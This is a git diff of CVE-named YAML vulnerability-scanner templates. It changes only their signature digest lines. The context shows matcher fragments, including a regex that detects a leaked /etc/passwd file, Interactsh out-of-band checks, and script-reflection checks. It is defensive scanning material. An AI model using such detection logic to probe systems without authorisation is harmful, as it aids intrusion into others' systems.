b/http/cves/2024/CVE-2024-0713.yaml index 267c293698..614e47bf2b 100644 --- a/http/cves/2024/CVE-2024-0713.yaml +++ b/http/cves/2024/CVE-2024-0713.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201055181c903e98898674fdb23437eb0e90871b42745b5c0d4aad9e3129dddf11022100c04264cde1575aff618e4b83359fa39d048cb64fbc9c3adbced30e325768c289:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207865526b425259e07024fac870f35786a61a851cc80adc31f50af1315dbb70f5022077b7fcab0b340df120fd03a87976f7c79ae545de9b114bbeb89ac0d7fa77b5d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1021.yaml b/http/cves/2024/CVE-2024-1021.yaml index 3bc25fe99d..fd8249780b 100644 --- a/http/cves/2024/CVE-2024-1021.yaml +++ b/http/cves/2024/CVE-2024-1021.yaml @@ -46,4 +46,4 @@ http: - '!contains(body_1, "<h1> Interactsh Server </h1>")' - 'status_code_2 == 200' condition: and -# digest: 4a0a0047304502210083066599f18b2c54a0a9076795f7d22b1ca8d8fad2c8f03a3147ec730c002e9702203386c976a8e99262651e52994ce6d95c2f342a0cc4e8518139df96275c9a03f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c8dcb630e55d93d987c9a3762240cb9645bcf34d01a16d7956fac27f0305b495022100b735b765090843b97037acb05a7df7d8fd2c276a622fba517fe63c67d3104f1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1071.yaml b/http/cves/2024/CVE-2024-1071.yaml index efac84fdae..1b2a26a019 100644 --- a/http/cves/2024/CVE-2024-1071.yaml +++ b/http/cves/2024/CVE-2024-1071.yaml @@ -61,4 +61,4 @@ http: regex: - '"nonce":"([0-9a-z]+)"' internal: true -# digest: 490a00463044022023025d307157dc2a97f59694d6703e6de5e5492820a9357d8a1a980e59010ca90220008b16687ffe30b37f8738816ab1e80fe8aacad0b5f8de07ac423c85f7146f36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d2df4a7cad579bad009987ee9d6530c566d41945f49f28209893750e5911d455022067f89316e7566747df1c9f3ace0ac1a3ff52891d51379e57cc750c506ad754ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1208.yaml b/http/cves/2024/CVE-2024-1208.yaml index d06d7ed936..ea22b280ea 100644 --- a/http/cves/2024/CVE-2024-1208.yaml +++ b/http/cves/2024/CVE-2024-1208.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008abc475f7d30df3a6b98733b219dede7a70dfd1c97e3c2928672e8574552af7f022100a8e1793227c1e4bbb6a2b10ceca86cd1c109f5bd43330f357f2a4a10c9c78184:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009ad10d599ee3e30855b6762e19b28a2ac7da9bc0c7706434f624700a515dfba5022100afa860c027433f125b3f43f5789fa421b42e30da5ae52855f7a826f598ce5e98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1209.yaml b/http/cves/2024/CVE-2024-1209.yaml index 46e4d49b37..d0eb06f584 100644 --- a/http/cves/2024/CVE-2024-1209.yaml +++ b/http/cves/2024/CVE-2024-1209.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220363799e96bf26f65aefc0de03e8fa5d4be7862d3bc87f1bd33ee217855e3541202204c371666413ff5962a77c1ef4ecfc419b2a00dec6859fc524b10dab24d46bc5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204ae0b7aaa5c2cc54e8f7f4f2d00c4fb4bde976c89042d6175ec87fd9ef4a99ed022065ef648949d50b42a6621c029c88b279dc5f56f8ff5358185bab08a0937cb7e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1210.yaml b/http/cves/2024/CVE-2024-1210.yaml index 77adf5117c..c5c9a101f9 100644 --- a/http/cves/2024/CVE-2024-1210.yaml +++ b/http/cves/2024/CVE-2024-1210.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204f99f7431a131299ee2561e6fb7bcc25f330b25ad1e06dd0679ced69336dc71c022100df619ceeef6954dc1b47304d723b9bfad50e69af08876232c9ef3159f9638438:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c80859e9500c040651b395581d3b3731a53c9bff54b209866749256a3b9f6411022100d846a7b23ffc3a21709bc5afc49c12f15cc45dad46cd5b8f257151c49916282d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1561.yaml b/http/cves/2024/CVE-2024-1561.yaml index 890f315b5a..8efbfcfd40 100644 --- a/http/cves/2024/CVE-2024-1561.yaml +++ b/http/cves/2024/CVE-2024-1561.yaml @@ -71,4 +71,4 @@ http: - regex('root:.*:0:0:', body) - 'contains(header, "text/plain")' condition: and -# digest: 490a004630440220321f22e77b20acc61afa7b5cbf1f465becdb09178d7c23342a1d1be0a11c843502205a9d96fc3f2429ce7f2566dce2a289b2ff6529266cee50a0d24bd60336562f19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220228b8f9ed4c8b48faa786cd1c48413831ef219341e029831e13f0a25f92be8a902204ff8d692224fa018c063b78b72507ddf2e92f2a750fd3b5cd0c01bc2f32a762f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1709.yaml b/http/cves/2024/CVE-2024-1709.yaml index 0b166ee532..c74b6d0427 100644 --- a/http/cves/2024/CVE-2024-1709.yaml +++ b/http/cves/2024/CVE-2024-1709.yaml @@ -56,4 +56,4 @@ http: part: header kval: - Server -# digest: 4b0a00483046022100df42d248b92130b0997228abe4ff00197ca95319ec494fcb457e36f99947b38b022100f14f62eb21d2dc5ebb6f7d9b2e3df0501572ace6e67a5cad42153418c3fae0b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200d59499217f5fa1b23e2853d0fbf6bf7ec8cf454bec8e03f9b282ba0454666c90220022fd485c85c7ae0d7d2c1d61f0137ac708e64e7088329ddd5ee7b09f2914326:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-20767.yaml b/http/cves/2024/CVE-2024-20767.yaml index 4b386cd7ef..ec6496cc66 100644 --- a/http/cves/2024/CVE-2024-20767.yaml +++ b/http/cves/2024/CVE-2024-20767.yaml @@ -53,4 +53,4 @@ http: regex: - "<var name='uuid'><string>(.*)</string>" internal: true -# digest: 4b0a00483046022100ae51132a490d9b1610ee3525362809c3c77ac5399cb74bd5070785b43cc2441e0221008bc1d323f198a3c3c0e615caceb32d4f55678113c27be537aeb55e5a329acb35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e6a9a13cc692e12629ce4b557e8a9cdaab2f6b3df9155e2bb4f5cac00241469b0220351a6751dda75fd857b8ac90f6cdca44f5853c3c3019070572245e97c7aec3eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-21644.yaml b/http/cves/2024/CVE-2024-21644.yaml index 99bff48091..86bd3dc8a4 100644 --- a/http/cves/2024/CVE-2024-21644.yaml +++ b/http/cves/2024/CVE-2024-21644.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f302e5b4df6df2065372cf020665c535b9de6c08a15a2c78c955109b9ab285c4022100e42e3025cf3b53f97264dab0c19a74e110d62d5fdcd038986cc4c6c3408f2004:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dbc462e6a4ec19c1e7ab2f6b6429fe16b06358c3fa73863c3e32131a6e13412e022100e7b446c295e5f3dbb670aff61f094db8306984f320e18dc9ddbf51a996c61905:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-21645.yaml b/http/cves/2024/CVE-2024-21645.yaml index 40f8b5da22..0250d430b5 100644 --- a/http/cves/2024/CVE-2024-21645.yaml +++ b/http/cves/2024/CVE-2024-21645.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022021729634e85ce3cca856b22c561467945ed9ed3bf435485b3256804092dc4ae90220233d82fed78afeb8e07ab2442277d3b206acbd3f928ca900fed17ce0ba29b641:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220216ceedbf4e4d3fc297fe0289353b2e737908320f01c52ee6744165ec80d0a250220380aec9a972d971780f7b55d7c2aedc82995efa4ff37219641782625ac06a453:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-21683.yaml b/http/cves/2024/CVE-2024-21683.yaml index ce5d967f29..53c6de5d31 100644 --- a/http/cves/2024/CVE-2024-21683.yaml +++ b/http/cves/2024/CVE-2024-21683.yaml @@ -68,4 +68,4 @@ http: - contains(interactsh_protocol, 'dns') - contains(body_3, "confluence") condition: and -# digest: 490a0046304402205e17e1f46f7d3be0e24a6719947291bcd7ee29f12eff3302d5caac3b06b960e00220762f9672204a4cd09ae9f6af85a8b7ec5c363be85a365d69f5416dc5d6582a80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d80092d262e68d1570c5fc81be4a315e236f16b2dbdf9a391d7b75c0d2fb7d170220293a0a26dcaa902e80096361b702205e20ec2bf87f23dd7ee911fb1ba767a77c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-21887.yaml b/http/cves/2024/CVE-2024-21887.yaml index 2b72f878a0..5efad6cb3e 100644 --- a/http/cves/2024/CVE-2024-21887.yaml +++ b/http/cves/2024/CVE-2024-21887.yaml @@ -52,4 +52,4 @@ http: - '"result":' - '"message":' condition: and -# digest: 4a0a004730450221008b11fb4caa72e93adcd3d6b4881baab60260caf734506dbeee298619d8a45db302205572b212a5aed50300f75693d3e4a74f34ee40ed420c6a4f2f83ded92f8699b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a2d7a9784797d3dc50639c2b76b4d29f645b1157608bb1816a0a6602cba6f380022100ee0ba2172fa6cc5ae3c7c1ebc35e92d4d9fed793450426258df98bb059c1025f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-21893.yaml b/http/cves/2024/CVE-2024-21893.yaml index 86e3acadc2..f111b9e3e3 100644 --- a/http/cves/2024/CVE-2024-21893.yaml +++ b/http/cves/2024/CVE-2024-21893.yaml @@ -50,4 +50,4 @@ http: - '/dana-na/' - 'WriteCSS' condition: and -# digest: 4b0a00483046022100a797d4c0fc87aff6583e71171c6d273e3f085bb60230c59a4a66e25d192d82d5022100a7a07c9ff12e69f386f9e2c80c1c134ea79bb8969038a584f32354d05de18618:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022027b9e6e74722d01d9812d29c2aeda9f8d8e2891891bacef19090cf225e7b43bd0220558c9cd77e216c8f6655742290f05d256049d8a020e84039644f22f3a4aa6601:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-22024.yaml b/http/cves/2024/CVE-2024-22024.yaml index 75c51f20ac..c64bac7317 100644 --- a/http/cves/2024/CVE-2024-22024.yaml +++ b/http/cves/2024/CVE-2024-22024.yaml @@ -47,4 +47,4 @@ http: - '/dana-na/' - 'WriteCSS' condition: and -# digest: 4b0a00483046022100e9957e443991b0960713b78c4fe96492cf6b6d9c5d70a45a77c8946752f125d1022100aba7f397b618737db6ab5865122dac0d1eab63346e36dc40656a995e97cbb619:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e0979daa200c98a79c4fce03c2de552e7e6b4dd8f9e8eeef99953fb2798f99df022016380198586e765e34ecc925177589ab2aff90201a5f02bdff0ce745fb81ee5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-22319.yaml b/http/cves/2024/CVE-2024-22319.yaml index d2f4fe807d..71a859f4ae 100644 --- a/http/cves/2024/CVE-2024-22319.yaml +++ b/http/cves/2024/CVE-2024-22319.yaml @@ -36,4 +36,4 @@ http: - 'contains(body, "patchLevel\":")' - 'status_code == 200' condition: and -# digest: 4a0a00473045022100bd482d70c6c93cf274bdde0ad6aefa255e1e20edcff44034afb21a45d3fc96e802204f0c9289a94160d4606e60e859ca554ead9d6b21a8441a9d9bf065ec7f9f3cd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206863aa5b7da352d26b89fcd6e35a46e44dfa7f91bb2ca228c4a923e133eabd3d022073888ea7ac5cf67513056508ed63ce310cb36d3c9501172574f0ce4dd389e9dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-22927.yaml b/http/cves/2024/CVE-2024-22927.yaml index 3da874ab23..650fcab2c0 100644 --- a/http/cves/2024/CVE-2024-22927.yaml +++ b/http/cves/2024/CVE-2024-22927.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220478cf55dd8920fb6cef6048870359141244744e6fd3b3fa26652c5c3440ee8080220629a2ff1f955e8ad2147df65ebc9b82b067fbdc5cb27ebbf650f8106928ed172:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f09b876bffc9bf19fef23c0132b906e61dad6194d544af49d2ebe2e55461d5810220763e5580653e88278ab1d2571df408542dd92b59b9f7be3212fd27693d4f1bc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-2340.yaml b/http/cves/2024/CVE-2024-2340.yaml index 8411fcbd94..66df150960 100644 --- a/http/cves/2024/CVE-2024-2340.yaml +++ b/http/cves/2024/CVE-2024-2340.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210086a9d9e4d491bbdaf66cc96f24d32ffa31c10df273bab32f91385760014d579b022048d3aa9fe3beec267bb552efa870d3ac9644d1501b28f39ab998dbef346ba1dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205ce1ac8b2838d3f39573c0dad38b90d092fc30429472656baf03db2659983c79022050f63a92a5a33033e109adbb6e973ac87138adb868fa226c73e064fb461a5424:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-23917.yaml b/http/cves/2024/CVE-2024-23917.yaml index 6ee3fb94af..4b5538ffe9 100644 --- a/http/cves/2024/CVE-2024-23917.yaml +++ b/http/cves/2024/CVE-2024-23917.yaml @@ -71,4 +71,4 @@ http: - "contains(content_type,'application/xml')" - "contains(body,'<projects href=')" condition: and -# digest: 4b0a00483046022100f2ab25f2474d2b66f27eac34cf59dd749516c75af1ec18933a8a2040ed0661a2022100b5fe19d35dcd8e849f3543cdde3db3a38866b8f64bf3c216f156ec0daabf27c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022042ca57e91002eeb95a0974c5cd85344b00d8168df68b416ab82e02dc3fdf729c0221009dc47418fd94b57d224080240cf710c7b669b600f37a6cfb92a1b1f75880b62c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-24131.yaml b/http/cves/2024/CVE-2024-24131.yaml index 1d53daef76..85820d38e9 100644 --- a/http/cves/2024/CVE-2024-24131.yaml +++ b/http/cves/2024/CVE-2024-24131.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a70e9370453935e96c9943ac035762c4f44bcaef30ad4b00ec48e58072ccfb00022100c2c66dd4e2b80a25bc7b8730d7f65343a45419533e5a521290e890f52352af77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022020f676dd7f70abc3d6a1d63bbd9c429e82c76b006a9b56d43a858050223f5b99022100a3dbccc48bd76c7a8f160c72ba8cbc13307a3663abebb859d6a22bd8a44683e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-24919.yaml b/http/cves/2024/CVE-2024-24919.yaml index 212090615c..4ed2a49243 100644 --- a/http/cves/2024/CVE-2024-24919.yaml +++ b/http/cves/2024/CVE-2024-24919.yaml @@ -38,4 +38,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204c9518dd059877a34844f2e2842d83fd41e2ad0697ab8806694bb9de593e5d4902210097a7f34cde999f290f86e0ea7544cfc1279e367211e05a8f2944fd8c46d352f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200cbd9f1fc5ea98e5649de5e1b43d62d38241188c12d1f4cf19709e2b2aab31a50220643a5fbf43545d89dd02819e0e92ee7fb898212836c04be5c18d446b1950705d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-25735.yaml b/http/cves/2024/CVE-2024-25735.yaml index f38f1da37a..4a66b1aedd 100644 --- a/http/cves/2024/CVE-2024-25735.yaml +++ b/http/cves/2024/CVE-2024-25735.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207a882963d4a3f8ed561c7c8c0babf15f2b40b9dcd1aa09112156fa30a9e53b89022100a0a1e3ee792bbbe946761e559cb03fe55fb5b61de9e9eafa674e7cefeaa34a68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210094aa267e9fcefa3b5cf6035541b466cd9772aa5cfe6735980c1bd6d4f2c481d9022100c63d8c195e067f627d83b89909d50cb22d9b5f1c25edc5d8fb8edad4d04458cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-26331.yaml b/http/cves/2024/CVE-2024-26331.yaml index f142818e0c..749842e403 100644 --- a/http/cves/2024/CVE-2024-26331.yaml +++ b/http/cves/2024/CVE-2024-26331.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210080910a3943e4988be013115a405cba6b2a3ebe196ba7484f7880a73f52e5134f02201aecddd5947b597c5263b214739ac08884025c217e2c5460e5e8f56cd60e5c39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200f98d8732efab432fb4a5776fb0cffdfa3bab1be29596883a3f08213b7a32c77022051ca3c0c66461b6fb3cb1c9ccbd1040c30467f4e59e830fd2bdc7f88370b331e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-27198.yaml b/http/cves/2024/CVE-2024-27198.yaml index 16cc2426d8..6b5009efa5 100644 --- a/http/cves/2024/CVE-2024-27198.yaml +++ b/http/cves/2024/CVE-2024-27198.yaml @@ -42,4 +42,4 @@ http: - 'contains(header, "application/xml")' - 'contains_all(body, "buildNumber", "server version", "internalId")' condition: and -# digest: 490a0046304402202c6f5201162870b8740cba1e24a1a2c07ffbfaffd2ec2014089965be490e0160022058c8821bc89e13c81538085bf8725658320ee8ccebb2ecade3d9755cd2a79e00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022028b6be218203626d48f0b0865d2531c617d75554ef795f70ae685e3055bb57d102200d791cf8dd53b096852970c4907cedf2d11bb1e09ae7990dfd78422b2180037d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-27956.yaml b/http/cves/2024/CVE-2024-27956.yaml index 6edaacd41d..bf14bf8963 100644 --- a/http/cves/2024/CVE-2024-27956.yaml +++ b/http/cves/2024/CVE-2024-27956.yaml @@ -45,4 +45,4 @@ http: - 'contains(header, "application/csv")' - 'contains_all(body, "DATE", "ACTION", "KEYWORD")' condition: and -# digest: 4a0a0047304502201afc1791826e1697d3a3aa1c115b03d228037f7e7725cbc1dc25dc3f37fb6798022100d14a7854e82d1afb46b5a04a8b6c429cf8ab2b7ce9fe9c11967a23d4519f7986:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022059d16ddd969cd0cc9c7c05d5ca2d66a1a4e5631bacd4815549a048eee5cf121702206ea54044b56d493bf48811a0def2447e3780f5783796e6a33becfcb9a2bd9d88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-28255.yaml b/http/cves/2024/CVE-2024-28255.yaml index 5d6038443a..646126ef44 100644 --- a/http/cves/2024/CVE-2024-28255.yaml +++ b/http/cves/2024/CVE-2024-28255.yaml @@ -43,4 +43,4 @@ http: - 'contains(body, "java.lang.Boolean")' - 'contains(header, "application/json")' condition: and -# digest: 4a0a00473045022100c0396d7d2cda35db57fec494cace654bac870c3441e8062bf8d202f35ccbf1e9022005757044cea4c00fe5c637c2d8134c5542795f4f41eeb6abd464db998a20471a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ba11d3498335ba1095da089f921bbe787ab7593a167794e6a318a940266c1852022100d866d668b6450e6b6a42dc1647a952564100f36d7e7cb5e1092d2070312ec863:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-28734.yaml b/http/cves/2024/CVE-2024-28734.yaml index 6590760ff5..9c9ae66d4e 100644 --- a/http/cves/2024/CVE-2024-28734.yaml +++ b/http/cves/2024/CVE-2024-28734.yaml @@ -39,4 +39,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220639152ac7101721af13e0f678be3f3ff7cf9b440afa2e13e5691cc2c62e3ccdf02207da7b95d3c2610f4b7d80e42eb444efd95d5f30f992d0335dfac80d9f72719c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201aaadc24cf45d9dfb1bf02a74d4c050dee86630aec998cf9fecb300af3c80b81022100a732dbb88437b2e94b89d4ad56fe2bbe5ce339d77a292639376b049919c7e896:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-2879.yaml b/http/cves/2024/CVE-2024-2879.yaml index a52bb5c2b4..f07dc24c46 100644 --- a/http/cves/2024/CVE-2024-2879.yaml +++ b/http/cves/2024/CVE-2024-2879.yaml @@ -55,4 +55,4 @@ http: - status_code == 200 - contains(body, "<script>") condition: and -# digest: 490a00463044022018e9ab68758dc46b0e8fa4a2f179139d263576514965c9076f0c2900381f4ef802203e45ad59adc22e90a0a05978f10e22f9158338cd41c4d07900229bb50ff24dc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210093a5b04866b078b807cfbd803744ae129e205970fc34c73f9973d5bfabdd2355022100ddc08432b37d7c1696f3d5b2e311091d4815737e67056280e524abc9c49b4f3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-29059.yaml b/http/cves/2024/CVE-2024-29059.yaml index 92a8ee3e7e..17e84f392e 100644 --- a/http/cves/2024/CVE-2024-29059.yaml +++ b/http/cves/2024/CVE-2024-29059.yaml @@ -78,4 +78,4 @@ http: - "contains(body_1,'ObjRef')" - "contains(x_vuln_test,'{{randstr}}')" condition: and -# digest: 490a00463044022075eae4fa0532f3bf10a0c94bd222dc4fd59b85ae03a5e0d02f2cd542a4069e5402206cfa5cdac2a1493b73fd82d8668018e591c958cf6d0dfd4e44786def094a509a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220766c9dfdbd7c65d458c73a8027ecca8ee56bf3dec4557d50ad109a37973b1c73022100adfdf589102d64e02c957796c152d64d392744895647a56b7d61d9b1e041b61e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-29269.yaml b/http/cves/2024/CVE-2024-29269.yaml index 187f9319f2..7b7d08c32b 100644 --- a/http/cves/2024/CVE-2024-29269.yaml +++ b/http/cves/2024/CVE-2024-29269.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202588a25e1042a61777bdb84f557b67a9f93b51713a37c41b28d81bbedf12324b022100c4770f328e89c8c133189d9c7d74131d77f77ea05e218d41dd03e4917674b2ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008b5117d474664154b7b9b2b8f2c14284599c81fcbe172df27d9793b3b4a8d65602206c4b5689c81e4a2e53e1e5917aa6e6dd97595c1d5a8c1313772ee7aea8d2473d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-3097.yaml b/http/cves/2024/CVE-2024-3097.yaml index e8e1642a26..4caca5cfd7 100644 --- a/http/cves/2024/CVE-2024-3097.yaml +++ b/http/cves/2024/CVE-2024-3097.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d937a4e33ba274ac20f1c8201f9a5ec5053252381b066f6ca34efbb0357112c5022100c5aa25daa1dcadea9076b1bfd0c414c26fd500c71e46d3e56461e1ef6be67149:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200580ebc91fbdcc0e60ee951ef840f931255129d83c455327d2b43c2da2c42c67022100a1d7c4877dbfdbdca2f30aea0099503a024334a4e4cfec758cd9b8700f49c3e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-3136.yaml b/http/cves/2024/CVE-2024-3136.yaml index 2e7bdcca6a..d77f57b538 100644 --- a/http/cves/2024/CVE-2024-3136.yaml +++ b/http/cves/2024/CVE-2024-3136.yaml @@ -59,4 +59,4 @@ http: group: 1 internal: true name: nonce -# digest: 4a0a0047304502206e33a2d814c15125c07d788ddd3fa86d8d8c00963ff4ee67ee6978b537395c2e022100c3dbee7b576104e81ce534ed2e9bcce2296b7a6ffeca66acde35e5d081bb93d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202b763dd72807cc252360a0934574e10db71e534d2dcb99664ef0d64f8e8a248002210097d5a1eaeb56e1c3c6b1f836e5c15a210596a30c9af148de0c5ee5b15b9e927f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-31848.yaml b/http/cves/2024/CVE-2024-31848.yaml index 63cc3fa62d..e05cb2e160 100644 --- a/http/cves/2024/CVE-2024-31848.yaml +++ b/http/cves/2024/CVE-2024-31848.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207716de1b37106fd74b61c49cce61a5d2f0c123e701fc9e66b91a52b18a37ea2a02200cd509769de5850cafe5c0d9c721ec1c13740712ac9e7a26abe2917eddf7b9e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f60c280d7939cdf6b9764473554ef08e27b39bc7a89269b236a5da5edebf2fcc0220595629ffc7c8ac007cf49020d64692109e9ac850c921d72f04ac2ba928314dec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-31849.yaml b/http/cves/2024/CVE-2024-31849.yaml index 3879c0511b..7b52a6f010 100644 --- a/http/cves/2024/CVE-2024-31849.yaml +++ b/http/cves/2024/CVE-2024-31849.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206306def4e2e9bd849a9223859d49dc3876b05ac689c4018361bce890427600d7022100f74718e6db0689ac6ce5206fc0b57545354477d87c84d0b8c6d3a3ff7524fdce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220350a856e04e48e23fe92d6383c1292fd9ec12afc4abe82ff10a7113ce0bd063602204757c78c4c1d5f0dba539eab295cf5a3beb8a0379c05189b7939ce27c38eccc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-31850.yaml b/http/cves/2024/CVE-2024-31850.yaml index 9b18e3423e..5b2aef20bb 100644 --- a/http/cves/2024/CVE-2024-31850.yaml +++ b/http/cves/2024/CVE-2024-31850.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a90aacad9d50c7b4f889f1ea7226b29388df438d5644c28822dc4a2715f9490502200ea6c2b15395f98c3499bf87ddb3dea4f98de351105b8418254967fc47e7c3aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cd99b8c05029378ef0f9167eea055e01f7fd30120908e870d3c8630899512f8f0220219632a880b9347a2f3e03d3640aa1ac332329928fe54c97d522fe72445c18e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-32399.yaml b/http/cves/2024/CVE-2024-32399.yaml index 0eb5208772..403d19dac2 100644 --- a/http/cves/2024/CVE-2024-32399.yaml +++ b/http/cves/2024/CVE-2024-32399.yaml @@ -33,4 +33,4 @@ http: - 'contains(header, "application/octet-stream")' - 'status_code == 200' condition: and -# digest: 4b0a00483046022100c68ae449c313523a338ad0b181aaa41e15eda98a9b200d3ed208a44ae24127a6022100e2c5a881638a9019355b8922941feb90086ba1dfe4d8175bfd566c3122caf772:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a4e4fec406f9745a3ec5ab8ef88a44a13b351b1b3c8a4148416cf83776e7632c022100a63559fdc8153e058c817e01043c453e8af311de120d56c15030608f4b5c5598:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-3273.yaml b/http/cves/2024/CVE-2024-3273.yaml index 